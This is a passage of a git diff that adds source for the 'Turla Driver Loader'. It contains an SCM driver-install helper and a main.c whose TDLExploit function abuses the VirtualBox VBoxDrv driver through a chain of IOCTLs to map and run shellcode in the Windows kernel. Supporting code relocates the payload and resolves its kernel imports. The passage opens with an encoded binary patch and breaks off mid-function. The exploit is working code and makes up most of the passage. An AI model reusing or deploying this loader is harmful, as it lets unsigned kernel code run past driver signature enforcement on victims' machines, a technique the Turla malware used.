zY#;9AtFWwcn9lT+$8mCdRjS*bNn4a@9aWT;C{#S?E!}i_)#ooAs>i+FK6Ugz(KRE@ z#-&5)Yirc#2@apL=!ehJE$4ekeBC&${mC!lW$w5BlGms|^x?~a_l_fGZof6yHM-EkO_k@PkOfQsdUA5B@dV-sV2l-2aDfW4~QSdkHn-8D6Ym z^bmd{mLn5>5-j@oS(`vZmL9D`7Kk#{1PfHjyh0V1iXt)ig{XSrEEv<87*%^ae&o>R zEHnNO>yXGXM$**S#LUXf%9oz|KisG(ZOq@O-oM)@sVO^J)j)NM@jr&n>HV)ghaAn! z@Y5OUJjci-FMMU*8#8Yovu6$F^8?&Gr<*Q3nHW4O>s+($>7QiYS==s&&3pGtb?yE| z`JLs?fs>~gh7b6~-9>M82Y%7+rsSg$`XACNd~RQ!^v0krt|h0ke$A*&5w23}N4MO4 z8PXPga_Y%#el~3nejmCsFg{E%ahE}N=$xigPtc|kQs`U7#U&9s+O#IEE=bdi45jW6 z-~`5S4Hw~1@FF0P6G_XGXkn7@5}_&d#=O|kr*&!VLd`<;3^k$H5nj(IHYUa((4QAI zL&-`S)bvlp7?5Hc`Z+2eIVQc6d!d!rRM^WnkQ|De;#!yB_Mte-Th_E3Fc&aBo?jX`3Q%-k6bCOd|mbF0v*f8CbhDq`ujJpSw# zuh!?S5-XdF^0&>GEqGA;`|-3Dr~KOP@6v9nFLnvKQ$KRfu_`O6MoYErCfP=-Ha$No zIcB1RowVeBwzB$BryC9_&$nMaFS1YZs(1a+ohfraCQO(Yy)<*!HhudY7rd@49sf?( z`rx#6RB@!t@_8TUd%acKJ4>E>>T}nw^@Vc7T22p5@jEZC7nLE_`TT9XR)hGN4%0dF z4^1_GZGz}K4H$Gs-<0FS*Wb_abhLkeH_~Y!tEk^Dqf@hmBEi>AFjz=2WoMB$GDkl<*GqUmVM3jiN`AVgs0p{0vol@`GS_ z{*d>pUn~`R6#w`Q?Osd*7>}s(gv9pO;_QQ*`OFYK_d&tg4l9ulBij-ajFKJjDOl&LHJGM?PLKsZ6J{e3q@g8{TZb zP5yYpi}=@zOO|nLj<2m5csTTJ#JUT|JPj(H#&;cPoVQ@4$giJ_!bcaq-?^z|#5s|+ zWLM9Ja(*vtm6shF*fOzx-~E-x7A*ORWhlBam031L^$IIy;4Fj7@unv02X7pFs3p{> z;>p94t5)lt${w>a_}FrvS)91zHWivH=Uq@3V)JYIGw%~JQK!G1ac({&IcS4g(%lJK z4Wr{<{K`7t`9y8_-P3!g*l!xKpm22VqxoGONu5h80~kMdxeaK!rZ%%|{pIS+Mb#aL z2flgacDwL%XkoSDxV>c?$W7E|Cc=mX*>KLLyDF_)Qd1E+K%L@h*{H?w0WUv zp>YQNulfysTM=$5_IA8pgv@qEY5Y?c!jM3p#_K}RGK(-t6SQwkhR}tep;;QR49rY~ zk3Sj4F~xBX|M<-3q=PamD`BHv{_(Ub#vjVAmupw~MBSIt**X8*g|*D5Vx9wEPSG-= zENdT~U+ccSNoeo}a&cM|Vae;AN6Co|6;m8CJz+$W z?Cg(sE;pUFW^OtkZ;7<1jwr-AYb2MvfV?R#JDoafIt@G@L)-GKzdQ(yHi@;BhpR=8Z(_6Fa4}85hu`S|jqo<7zK~3G`MQ8X0_W= zC95&opYK&ivQw|M-coXTy8nIbt@J0Jx>e&szm9W0$nZ|jGd{BZ`kFwxWZRXo`QIuH z5B`)Ld#`28cEyvQk9*Z9&}m|-h<~a6v9IpbZ*ToqgdjOfCH;aiZPmA%ASv4Sf9F*B z-}M8vyI-eJ+$%3mt=_lcud~vtH91-LLuRL5ZBb;pp4>h8fmfW}CrNY8;Xz#ObxD!Y z$0Ubnu&t%PuekRqalXY$%SZJtQYi)7R$cay7O6YMn40gCnWZ_qEAs526Q7kd{%Q(v zzaSGakNfhM^IB`}HjkAyPBcy(8XzNaamiKFF$Xy22XC`=c>j!=`Jd=qUzbp8EK4a#h$LH`a8uB`X{wM4dqt6NY z4||@z7hiaN#Gsq=R=piRaO<*ZrPMEM$?&*@QeFq|joU&x@T{|E^BD1;8Az7i^Lp|H?p7{GY#fp0pXGRame|G$fI5(HQ zOE5($V z<;V>wZ*?umgUCI;-FNKRA`i(DN-F&X9%x3IuyP7Eg)^94>cF8lMR@;bB@SuV=N zkG1qJ4`P#Fcj=k%tCCTGcP?&Dn;Dz1ENI${MWzwmNft@|=jJc}u1~ll_he(vm7Nc# zty=cEGkdv4_%kP!PTkr=>j#M)dllI5ASC#za`V-ZPI?_VS!*`c=%lbK|ExC{e6dp5 zl`FY@ybOJLNY1nm%{Nzj3{igR(Q(@F{g*#IU*|1tjchcd*UYz%d2RP+<4+IwWLeL& zvgAnEWQNVrbvsk)eJ~>H(&mpg7ao7j>KbhGOMLzx_hO^gI`}u_)I08plgnryzN#@Y zqA`Bx`W=6sld*jMTAev9#(OPuh4sjzqfPf`i?2SkID7Y971g{-X|Jf zl8n#FKi@cBGK4W)gb_vN_5(=gAy2NpF*5#Xmhr>+z^I;$D&k_^XgPS0qH#Gl2LJ3S zyFPtIz-O5;bCT_&2HlbN_6YB~p1-hj8$E+;Tt&>CcBP#QoeCW@9E46RA_a}r5LYsc zxZz>s5}y$_niCXJ@c6UT@bz}^Gw8i$z+>Z-#4=sOgy&UTjOlP zM}3y4TTqzG%-eG|aFX7=_ZXOay}t9nu2{Yhi>lJJ>tTyJZAcsJDZ|Z zU*4f&wGW?P@WyT4sXH2B8s5(wj-J}AW1{?rO}@&?)H7bUbhS)w8V*mA@`=3bK73>O zvjuN9ZCyRx+IQ|TqjD*;&EBPV&G6n*6I1J*DPli;-M4)8uH37#*6jQjChkg_2d5r+ zp8Csorkk1k-zyzXO}XQdbw!3kDa@7msLByY_Up=E3{Lb zEjDV>(J7e+nR4QvM!ibO`OZDNxXI<7qukgL(T&GjzExC*`Ph7!>-eZKbyIc}d-mcH z#>KfM2ZGiHeUoz<%}>0IsZ0AG5xm{vJJu7#b-I{{;V{S z4xFMr6Japu=>L^zPTyM+y?03pJ!u7@yCSkIa%FCK@8x|_maNcXF`SGE?z~8gu`u1A znkoO%*V})&E@yk=Z)z6@4-q-DS$G`5H4(AYl%TuvI)h3y15Kp^Qg&=K-`O_K%Ic-P zCrirrS#iP}Yi02#c`a(~59}gx{CsooEvuX4GCTS4nFluM&P@(Jd(6iu-WE0elK$DW z^@gvpgVU{ojj3u{TO7|_7rAdCt<~64sh_fMWn%5UJKH?RWoc&Si>^%QC=3=;SQ4XY@3Kon(~C+{WDJt-bI*x? z1T?RPnj}7dtac#vSdiNZ^MN0ta_(5iYN|O`y*Ri3*i%jB$4>5@cVU}move7Ypu@{U zeDUV4cCnVihgVL%kjUNdp1S&1*P2iBnEOr`9k8{nUYGwR+5F4e8KaAAD+U`^@6Y}{ n%S&B!u3uvK>=?D`lEKV5BfWkWcd9q?(lc76qS3^}{Nn!rDF%wE literal 0 HcmV?d00001 diff --git a/Source/Furutaka/global.h b/Source/Furutaka/global.h new file mode 100644 index 0000000..c6cf4d0 --- /dev/null +++ b/Source/Furutaka/global.h @@ -0,0 +1,50 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2016 +* +* TITLE: GLOBAL.H +* +* VERSION: 1.00 +* +* DATE: 01 Feb 2016 +* +* Common header file for the program support routines. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ + +#pragma once + +//disable nonmeaningful warnings. +#pragma warning(disable: 4005) // macro redefinition +#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression +#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union +#pragma warning(disable: 6102) // Using %s from failed function call at line %u +#pragma warning(disable: 6320) //exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER + +#include +#include +#include "ntos.h" +#include "minirtl\minirtl.h" +#include "minirtl\rtltypes.h" +#include "minirtl\cmdline.h" +#include "sup.h" +#include "cui.h" +#include "instdrv.h" + +#if !defined UNICODE +#error ANSI build is not supported +#endif + +#if (_MSC_VER >= 1900) +#ifdef _DEBUG +#pragma comment(lib, "vcruntimed.lib") +#pragma comment(lib, "ucrtd.lib") +#else +#pragma comment(lib, "libvcruntime.lib") +#endif +#endif diff --git a/Source/Furutaka/instdrv.c b/Source/Furutaka/instdrv.c new file mode 100644 index 0000000..5d53482 --- /dev/null +++ b/Source/Furutaka/instdrv.c @@ -0,0 +1,265 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2015 - 2016, portions (C) Mark Russinovich, FileMon +* +* TITLE: INSTDRV.C +* +* VERSION: 1.11 +* +* DATE: 01 Feb 2016 +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ +#include "global.h" + +/* +* scmInstallDriver +* +* Purpose: +* +* Create SCM service entry describing kernel driver. +* +*/ +BOOL scmInstallDriver( + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName, + _In_opt_ LPCTSTR ServiceExe + ) +{ + SC_HANDLE schService; + + schService = CreateService(SchSCManager, // SCManager database + DriverName, // name of service + DriverName, // name to display + SERVICE_ALL_ACCESS, // desired access + SERVICE_KERNEL_DRIVER, // service type + SERVICE_DEMAND_START, // start type + SERVICE_ERROR_NORMAL, // error control type + ServiceExe, // service's binary + NULL, // no load ordering group + NULL, // no tag identifier + NULL, // no dependencies + NULL, // LocalSystem account + NULL // no password + ); + if (schService == NULL) { + return FALSE; + } + + CloseServiceHandle(schService); + return TRUE; +} + +/* +* scmStartDriver +* +* Purpose: +* +* Start service, resulting in SCM drvier load. +* +*/ +BOOL scmStartDriver( + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName + ) +{ + SC_HANDLE schService; + BOOL ret; + + schService = OpenService(SchSCManager, + DriverName, + SERVICE_ALL_ACCESS + ); + if (schService == NULL) + return FALSE; + + ret = StartService(schService, 0, NULL) + || GetLastError() == ERROR_SERVICE_ALREADY_RUNNING; + + CloseServiceHandle(schService); + + return ret; +} + +/* +* scmOpenDevice +* +* Purpose: +* +* Open driver device by symbolic link. +* +*/ +BOOL scmOpenDevice( + _In_ LPCTSTR DriverName, + _Inout_opt_ PHANDLE lphDevice + ) +{ + TCHAR completeDeviceName[64]; + HANDLE hDevice; + + RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName)); + wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName); + + hDevice = CreateFile(completeDeviceName, + GENERIC_READ | GENERIC_WRITE, + 0, + NULL, + OPEN_EXISTING, + FILE_ATTRIBUTE_NORMAL, + NULL + ); + if (hDevice == INVALID_HANDLE_VALUE) + return FALSE; + + if (lphDevice) { + *lphDevice = hDevice; + } + else { + CloseHandle(hDevice); + } + + return TRUE; +} + +/* +* scmStopDriver +* +* Purpose: +* +* Command SCM to stop service, resulting in driver unload. +* +*/ +BOOL scmStopDriver( + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName + ) +{ + INT iRetryCount; + SC_HANDLE schService; + BOOL ret; + SERVICE_STATUS serviceStatus; + + ret = FALSE; + schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS); + if (schService == NULL) { + return ret; + } + + iRetryCount = 5; + do { + SetLastError(0); + + ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus); + if (ret == TRUE) + break; + + if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING) + break; + + Sleep(1000); + iRetryCount--; + } while (iRetryCount); + + CloseServiceHandle(schService); + + return ret; +} + +/* +* scmRemoveDriver +* +* Purpose: +* +* Remove service entry from SCM database. +* +*/ +BOOL scmRemoveDriver( + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName + ) +{ + SC_HANDLE schService; + BOOL bResult = FALSE; + + schService = OpenService(SchSCManager, + DriverName, + DELETE + ); + + if (schService == NULL) { + return bResult; + } + + bResult = DeleteService(schService); + + CloseServiceHandle(schService); + + return bResult; +} + +/* +* scmUnloadDeviceDriver +* +* Purpose: +* +* Combines scmStopDriver and scmRemoveDriver. +* +*/ +BOOL scmUnloadDeviceDriver( + _In_ LPCTSTR Name + ) +{ + SC_HANDLE schSCManager; + BOOL bResult = FALSE; + + if (Name == NULL) { + return bResult; + } + + schSCManager = OpenSCManager(NULL, + NULL, + SC_MANAGER_ALL_ACCESS + ); + if (schSCManager) { + scmStopDriver(schSCManager, Name); + bResult = scmRemoveDriver(schSCManager, Name); + CloseServiceHandle(schSCManager); + } + return bResult; +} + +/* +* scmLoadDeviceDriver +* +* Purpose: +* +* Unload if already exists, Create, Load and Open driver instance. +* +*/ +BOOL scmLoadDeviceDriver( + _In_ LPCTSTR Name, + _In_opt_ LPCTSTR Path, + _Inout_ PHANDLE lphDevice + ) +{ + SC_HANDLE schSCManager; + BOOL bResult = FALSE; + + if (Name == NULL) { + return bResult; + } + + schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); + if (schSCManager) { + scmRemoveDriver(schSCManager, Name); + scmInstallDriver(schSCManager, Name, Path); + scmStartDriver(schSCManager, Name); + bResult = scmOpenDevice(Name, lphDevice); + CloseServiceHandle(schSCManager); + } + return bResult; +} diff --git a/Source/Furutaka/instdrv.h b/Source/Furutaka/instdrv.h new file mode 100644 index 0000000..91400f2 --- /dev/null +++ b/Source/Furutaka/instdrv.h @@ -0,0 +1,54 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2015, portions (C) Mark Russinovich, FileMon +* +* TITLE: INSTDRV.H +* +* VERSION: 1.10 +* +* DATE: 10 Mar 2015 +* +* Common header file for the program SCM usage. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ + +BOOL scmInstallDriver( + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName, + _In_opt_ LPCTSTR ServiceExe + ); + +BOOL scmStartDriver( + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName + ); + +BOOL scmOpenDevice( + _In_ LPCTSTR DriverName, + _Inout_opt_ PHANDLE lphDevice + ); + +BOOL scmStopDriver( + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName + ); + +BOOL scmRemoveDriver( + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName + ); + +BOOL scmUnloadDeviceDriver( + _In_ LPCTSTR Name + ); + +BOOL scmLoadDeviceDriver( + _In_ LPCTSTR Name, + _In_opt_ LPCTSTR Path, + _Inout_ PHANDLE lphDevice + ); diff --git a/Source/Furutaka/main.c b/Source/Furutaka/main.c new file mode 100644 index 0000000..aaad15b --- /dev/null +++ b/Source/Furutaka/main.c @@ -0,0 +1,838 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2016 +* +* TITLE: MAIN.C +* +* VERSION: 1.00 +* +* DATE: 04 Feb 2016 +* +* Furutaka entry point. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ + +#include "global.h" +#include +#include "vbox.h" +#include "shellcode.h" + +#pragma data_seg("shrd") +volatile LONG g_lApplicationInstances = 0; +#pragma data_seg() +#pragma comment(linker, "/Section:shrd,RWS") + +HINSTANCE g_hInstance; +HANDLE g_ConOut = NULL; +HANDLE g_hVBox = INVALID_HANDLE_VALUE; +BOOL g_ConsoleOutput = FALSE; +BOOL g_VBoxInstalled = FALSE; +WCHAR BE = 0xFEFF; + +#define VBoxDrvSvc TEXT("VBoxDrv") +#define supImageName "furutaka" +#define supImageHandle 0x1a000 +#define PAGE_SIZE 0x1000 +#define scDataOffset 0x214 //shellcode data offset + +#define T_LOADERTITLE TEXT("Turla Driver Loader v1.0 (04/02/16)") +#define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n") +#define T_LOADERRUN TEXT("Another instance running, close it before\r\n") +#define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n") +#define T_LOADERINTRO TEXT("Turla Driver Loader v1.0.0 started\r\n(c) 2016 TDL Project\r\nSupported x64 OS : 7 and above\r\n") + +/* +* TDLVBoxInstalled +* +* Purpose: +* +* Check VirtualBox software installation state. +* +*/ +BOOL TDLVBoxInstalled( + VOID + ) +{ + BOOL bPresent = FALSE; + LRESULT lRet; + HKEY hKey = NULL; + + lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), + 0, KEY_READ, &hKey); + + bPresent = (hKey != NULL); + + if (hKey) { + RegCloseKey(hKey); + } + + return bPresent; +} + +/* +* TDLRelocImage +* +* Purpose: +* +* Process image relocs. +* +*/ +void TDLRelocImage( + ULONG_PTR Image, + ULONG_PTR NewImageBase + ) +{ + PIMAGE_OPTIONAL_HEADER popth; + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; + + popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; + + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)NewImageBase - popth->ImageBase; + c = 0; + + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); + + while (p < rel->SizeOfBlock) { + + switch (*chains >> 12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } + + chains++; + p += sizeof(WORD); + } + + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } +} + +/* +* TDLGetProcAddress +* +* Purpose: +* +* Get NtOskrnl procedure address. +* +*/ +ULONG_PTR TDLGetProcAddress( + ULONG_PTR KernelBase, + ULONG_PTR KernelImage, + LPCSTR FunctionName + ) +{ + ANSI_STRING cStr; + ULONG_PTR pfn = 0; + + RtlInitString(&cStr, FunctionName); + if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID)&pfn))) + return 0; + + return KernelBase + (pfn - KernelImage); +} + +/* +* TDLResolveKernelImport +* +* Purpose: +* +* Resolve import (ntoskrnl only). +* +*/ +void TDLResolveKernelImport( + ULONG_PTR Image, + ULONG_PTR KernelImage, + ULONG_PTR KernelBase + ) +{ + PIMAGE_OPTIONAL_HEADER popth; + ULONG_PTR ITableVA, *nextthunk; + PIMAGE_IMPORT_DESCRIPTOR ITable; + PIMAGE_THUNK_DATA pthunk; + PIMAGE_IMPORT_BY_NAME pname; + ULONG i; + + popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; + + if (popth->NumberOfRvaAndSizes <= IMAGE_DIRECTORY_ENTRY_IMPORT) + return; + + ITableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; + if (ITableVA == 0) + return; + + ITable = (PIMAGE_IMPORT_DESCRIPTOR)(Image + ITableVA); + + if (ITable->OriginalFirstThunk == 0) + pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->FirstThunk); + else + pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->OriginalFirstThunk); + + for (i = 0; pthunk->u1.Function != 0; i++, pthunk++) { + nextthunk = (PULONG_PTR)(Image + ITable->FirstThunk); + if ((pthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) == 0) { + pname = (PIMAGE_IMPORT_BY_NAME)((PCHAR)Image + pthunk->u1.AddressOfData); + nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, pname->Name); + } + else + nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, (LPCSTR)(pthunk->u1.Ordinal & 0xffff)); + } +} + +/* +* TDLExploit +* +* Purpose: +* +* VirtualBox exploit used by WinNT/Turla. +* +*/ +void TDLExploit( + LPVOID Shellcode, + ULONG CodeSize + ) +{ + SUPCOOKIE Cookie; + SUPLDROPEN OpenLdr; + DWORD bytesIO = 0; + RTR0PTR ImageBase = NULL; + ULONG_PTR paramOut; + PSUPLDRLOAD pLoadTask = NULL; + SUPSETVMFORFAST vmFast; + SUPLDRFREE ldrFree; + SIZE_T memIO; + WCHAR text[256]; + + while (g_hVBox != INVALID_HANDLE_VALUE) { + RtlSecureZeroMemory(&Cookie, sizeof(SUPCOOKIE)); + Cookie.Hdr.u32Cookie = SUPCOOKIE_INITIAL_COOKIE; + Cookie.Hdr.cbIn = SUP_IOCTL_COOKIE_SIZE_IN; + Cookie.Hdr.cbOut = SUP_IOCTL_COOKIE_SIZE_OUT; + Cookie.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + Cookie.Hdr.rc = 0; + Cookie.u.In.u32ReqVersion = 0; + Cookie.u.In.u32MinVersion = 0x00070002; + RtlCopyMemory(Cookie.u.In.szMagic, SUPCOOKIE_MAGIC, sizeof(SUPCOOKIE_MAGIC)); + + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_COOKIE, + &Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie, + SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_COOKIE call failed"), g_ConsoleOutput, TRUE); + break; + } + + RtlSecureZeroMemory(&OpenLdr, sizeof(OpenLdr)); + OpenLdr.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + OpenLdr.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + OpenLdr.Hdr.cbIn = SUP_IOCTL_LDR_OPEN_SIZE_IN; + OpenLdr.Hdr.cbOut = SUP_IOCTL_LDR_OPEN_SIZE_OUT; + OpenLdr.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + OpenLdr.Hdr.rc = 0; + OpenLdr.u.In.cbImage = CodeSize; + RtlCopyMemory(OpenLdr.u.In.szName, supImageName, sizeof(supImageName)); + + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_OPEN, &OpenLdr, + SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr, + SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x")); + u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + ImageBase = OpenLdr.u.Out.pvImageBase; + + memIO = PAGE_SIZE + CodeSize; + NtAllocateVirtualMemory(NtCurrentProcess(), &pLoadTask, 0, &memIO, + MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + + if (pLoadTask == NULL) + break; + + pLoadTask->Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + pLoadTask->Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + pLoadTask->Hdr.cbIn = + (ULONG_PTR)(&((PSUPLDRLOAD)0)->u.In.achImage) + CodeSize; + pLoadTask->Hdr.cbOut = SUP_IOCTL_LDR_LOAD_SIZE_OUT; + pLoadTask->Hdr.fFlags = SUPREQHDR_FLAGS_MAGIC; + pLoadTask->Hdr.rc = 0; + pLoadTask->u.In.eEPType = SUPLDRLOADEP_VMMR0; + pLoadTask->u.In.pvImageBase = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0 = (RTR0PTR)supImageHandle; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryEx = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryFast = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryInt = ImageBase; + RtlCopyMemory(pLoadTask->u.In.achImage, Shellcode, CodeSize); + pLoadTask->u.In.cbImage = CodeSize; + + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_LOAD, + pLoadTask, pLoadTask->Hdr.cbIn, + pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: SUP_IOCTL_LDR_LOAD, success\r\n\tShellcode mapped at 0x")); + u64tohex((ULONG_PTR)ImageBase, _strend(text)); + _strcat(text, TEXT(", size = 0x")); + ultohex(CodeSize, _strend(text)); + + _strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); + u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + RtlSecureZeroMemory(&vmFast, sizeof(vmFast)); + vmFast.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + vmFast.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + vmFast.Hdr.rc = 0; + vmFast.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + vmFast.Hdr.cbIn = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN; + vmFast.Hdr.cbOut = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT; + vmFast.u.In.pVMR0 = (LPVOID)supImageHandle; + + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_SET_VM_FOR_FAST, + &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN, + &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), g_ConsoleOutput, TRUE); + } + + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), g_ConsoleOutput, TRUE); + + paramOut = 0; + DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP, + NULL, 0, + ¶mOut, sizeof(paramOut), &bytesIO, NULL); + + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_FREE"), g_ConsoleOutput, TRUE); + + RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree)); + ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + ldrFree.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + ldrFree.Hdr.cbIn = SUP_IOCTL_LDR_FREE_SIZE_IN; + ldrFree.Hdr.cbOut = SUP_IOCTL_LDR_FREE_SIZE_OUT; + ldrFree.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + ldrFree.Hdr.rc = 0; + ldrFree.u.In.pvImageBase = ImageBase; + + DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_FREE, + &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_IN, + &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_OUT, &bytesIO, NULL); + + break; + } + + if (pLoadTask != NULL) { + memIO = 0; + NtFreeVirtualMemory(NtCurrentProcess(), &pLoadTask, &memIO, MEM_RELEASE); + } + + if (g_hVBox != INVALID_HANDLE_VALUE) { + CloseHandle(g_hVBox); + g_hVBox = INVALID_HANDLE_VALUE; + } +} + +/* +* TDLMapDriver +* +* Purpose: +* +* Build shellcode and execute exploit. +* +*/ +UINT TDLMapDriver( + LPWSTR lpDriverFullName + ) +{ + UINT result = (UINT)-1; + ULONG isz; + SIZE_T memIO; + ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; + HMODULE Image = NULL; + PIMAGE_NT_HEADERS FileHeader; + PBYTE Buffer = NULL; + UNICODE_STRING uStr; + ANSI_STRING routineName; + NTSTATUS status; + WCHAR text[256]; + + KernelBase = supGetNtOsBase(); + while (KernelBase != 0) { + + _strcpy(text, TEXT("Ldr: Kernel base = 0x")); + u64tohex(KernelBase, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + + RtlSecureZeroMemory(&uStr, sizeof(uStr)); + RtlInitUnicodeString(&uStr, lpDriverFullName); + status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&Image); + if ((!NT_SUCCESS(status)) 